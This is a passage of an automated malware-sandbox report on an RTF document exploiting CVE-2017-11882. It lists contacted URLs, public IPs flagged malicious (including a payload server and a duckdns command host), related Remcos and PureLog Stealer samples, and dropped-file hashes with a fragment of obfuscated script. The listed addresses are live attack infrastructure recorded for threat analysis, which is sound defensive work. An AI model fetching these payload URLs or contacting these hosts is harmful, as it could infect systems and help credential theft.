                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.386327941.000000000269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/8/nrrV73987.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.394160239.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.645253852.0000000000459000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.29.10.52powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC:EQNEDT32.EXE, 00000002.00000003.360658703.00000000005AA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Contentpowershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.com/GKRegAsm.exe, 0000000F.00000002.392868130.000000000037C000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.msn.com/advertisement.ad.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.29.10.52
                        		unknownEuropean Union
                        		60567DATACLUB-SEtrue
                        192.210.150.29
                        		authurremc.duckdns.orgUnited States
                        		36352AS-COLOCROSSINGUStrue
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse
                        207.241.227.240
                        		ia600100.us.archive.orgUnited States
                        		7941INTERNET-ARCHIVEUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519296
                        Start date and time:2024-09-26 10:32:07 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 23s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
                        Detection:MAL
                        Classification:mal100.rans.phis.troj.spyw.expl.evad.winRTF@29/20@3/4
                        EGA Information:
                        • Successful, ratio: 71.4%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 179
                        • Number of non-executed functions: 317
                        Cookbook Comments:
                        • Found application associated with file extension: .rtf
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 79586.0484168577 for current running targets taking high CPU consumption
                        • Override analysis time to 159172.096833715 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3352 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 3568 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:32:59API Interceptor293x Sleep call for process: EQNEDT32.EXE modified
                        04:33:03API Interceptor13x Sleep call for process: wscript.exe modified
                        04:33:04API Interceptor107x Sleep call for process: powershell.exe modified
                        04:33:13API Interceptor5703531x Sleep call for process: RegAsm.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.29.10.52Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 185.29.10.52/55/AUNCC.txt
                        SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 185.29.10.52/55/AUNCC.txt
                        192.210.150.291561073.xlsGet hashmaliciousUnknownBrowse
                        • 192.210.150.29/xampp/ebm/flowersandlionsbothgreatattitudeimage.bmp
                        Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 192.210.150.29/6050/IGCC.exe
                        178.237.33.506122.scr.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        6122.scr.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        file.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • geoplugin.net/json.gp
                        z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • geoplugin.net/json.gp
                        1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        authurremc.duckdns.orgFwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 192.210.150.29
                        SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 192.210.150.29
                        17271612591ab6f17ada184393f4f649df7ae1e0875e1ed7c7f90b08ae9f86559128c060fa548.dat-decoded.exeGet hashmaliciousRemcosBrowse
                        • 192.210.150.29
                        geoplugin.net6122.scr.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        6122.scr.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        file.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 178.237.33.50
                        z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 178.237.33.50
                        ia600100.us.archive.orgLJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                        • 207.241.227.240
                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                        • 207.241.227.240
                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 207.241.227.240
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                        • 207.241.227.240
                        SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DATACLUB-SEFwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 185.29.10.52
                        SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 185.29.10.52
                        tMkxadpE7f.vbsGet hashmaliciousRemcosBrowse
                        • 109.248.144.231
                        Pt Mills Request.exeGet hashmaliciousXWormBrowse
                        • 109.248.144.181
                        NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                        • 109.248.144.173
                        Scan document.xlsGet hashmaliciousUnknownBrowse
                        • 109.248.144.173
                        Purchase order.xlsGet hashmaliciousRemcosBrowse
                        • 109.248.144.173
                        createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                        • 185.29.9.32
                        erthings.docGet hashmaliciousUnknownBrowse
                        • 185.29.9.32
                        Scan copy.xlsGet hashmaliciousUnknownBrowse
                        • 185.29.9.32
                        INTERNET-ARCHIVEUShttp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                        • 207.241.237.3
                        LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                        • 207.241.227.240
                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                        • 207.241.227.240
                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 207.241.227.240
                        TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 207.241.227.240
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                        • 207.241.227.240
                        ATOM86-ASATOM86NL6122.scr.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        6122.scr.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        file.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 178.237.33.50
                        z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 178.237.33.50
                        AS-COLOCROSSINGUSLJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                        • 104.168.32.148
                        DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
                        • 192.3.220.20
                        DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
                        • 192.3.220.20
                        SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 107.173.4.16
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 104.168.32.148
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 192.210.150.29
                        1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 192.3.146.145
                        K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                        • 107.175.243.142
                        C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                        • 107.175.113.252
                        RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 107.173.4.16

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        05af1f5ca1b87cc9cc9b25185115607dPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 207.241.227.240
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 207.241.227.240
                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 207.241.227.240
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 207.241.227.240
                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                        • 207.241.227.240
                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240
                        SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        • 207.241.227.240

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4760
                        Entropy (8bit):4.834060479684549
                        Encrypted:false
                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                        Malicious:false
                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\makepicturewithgreatthingstobeonline[1].tiff

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):242204
                        Entropy (8bit):3.7503849148647648
                        Encrypted:false
                        SSDEEP:3072:e6OFbCm2KNCDW+SIVq7+r7Gqrgt5pHGw/Wn8Sbgt86sRzkZNCQ7/EhPVFf0NCWl7:eQmY8IVr7GLWIF4zSbEhXOCWlIVpWB
                        MD5:23E413B982049B148C538D6CB7D3806D
                        SHA1:1A2242865CA56FC82CA987811E0BC6407A272B27
                        SHA-256:2004D59D558983F5D19B914B2B348F75443C81B6F2CF0C76F7735037D376CED1
                        SHA-512:6C8B319159EF4E20E19E3BAAA7357927F0D3E4C60AC2C4CAD0AFCAED04175A595CE0C417ED4556215B049841274F3B4BE67BD4E8B6D10F53C5E2FEB5304A6913
                        Malicious:false
                        Preview:..a.L.T.C.K.n.o.H.n.c.C.f.Z.T.d.d.o.i.J.c.P.P.c. .=. .".C.z.W.k.G.A.L.j.W.P.a.K.c.P.c.J.R.v.u.h.W.c.Z.".....u.c.G.c.e.Q.N.c.K.Z.j.c.L.Q.I.W.I.I.f.B.N.o.L. .=. .".P.I.o.K.W.z.j.f.W.A.b.W.G.o.q.K.N.h.A.W.L.L.B.".....a.o.Z.a.G.b.s.L.x.n.K.K.p.G.U.S.I.c.L.p.P.r.U. .=. .".Z.u.W.K.x.G.n.p.n.H.G.R.L.i.c.W.C.q.o.U.k.k.h.".....r.O.U.U.A.m.e.A.i.a.Z.a.p.C.G.G.p.T.W.G.K.L.W. .=. .".i.K.g.i.c.K.C.p.e.q.h.K.T.k.W.o.L.N.G.L.H.k.a.".....n.l.O.G.l.c.L.S.W.W.O.W.o.k.L.k.W.J.c.s.e.L.U. .=. .".W.K.c.c.L.U.K.W.o.c.j.f.O.K.a.L.p.Q.U.C.R.O.N.".....o.H.L.W.O.i.b.m.h.Z.s.z.R.B.K.L.U.i.L.c.W.i.J. .=. .".T.z.L.p.f.p.h.B.b.c.l.H.L.j.l.q.L.x.W.Z.b.P.z.".....W.s.d.U.L.z.p.p.W.L.K.k.G.L.G.x.W.L.z.u.h.i.a. .=. .".i.U.j.i.m.f.m.p.h.L.b.Q.N.g.C.e.K.N.k.b.W.v.A.".....K.s.W.a.m.h.K.z.p.k.b.i.f.W.W.o.K.W.b.d.W.x.z. .=. .".I.t.B.K.L.x.S.k.j.d.J.P.m.e.u.i.Z.R.L.G.W.u.h.".....i.d.l.r.l.z.U.m.G.C.U.o.z.b.i.o.c.z.P.L.m.k.N. .=. .".Z.G.c.c.G.f.h.e.Z.i.l.U.k.v.A.a.c.e.r.n.a.d.a.a.e.c.k.K.".....U.i.L.L.A.q.z.a.U.G.c.L.f.z.l.U.s.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):962
                        Entropy (8bit):5.013811273052389
                        Encrypted:false
                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                        Malicious:false
                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{72EA0E42-6FDC-4B96-A501-AB452790C141}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:CE338FE6899778AACFC28414F2D9498B
                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1FA464AF-8054-47FB-B7CE-D3A76F2305F3}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):3.567844627766266
                        Encrypted:false
                        SSDEEP:192:KPvOZhz3Py+Lg0YcKJ+qhuiVnmdULwf/xSqgVvtiMQrTC5PYgWpHOe8yLqDE:KuZhzXgjJbuiVm0ibHCOgsHZJLeE
                        MD5:E03A7F0C6E83FCBC9A98CA3E4D4847E2
                        SHA1:F08C26EAF174A0234FE6C521D87695131B9B1A5E
                        SHA-256:3CC89A9EF677DB2CC8262DD1CDB4BE48024D5AF3D60A5838AEF6830E4FDA5D7A
                        SHA-512:A197D4A7DBE96D4A32259A21E5CEA10D300388A670AB382F7512C3EA98C8C9137ECEB2885944CFD66B74751A446035AE8283B1692465F22A6AFD9D6D27ECD73C
                        Malicious:false
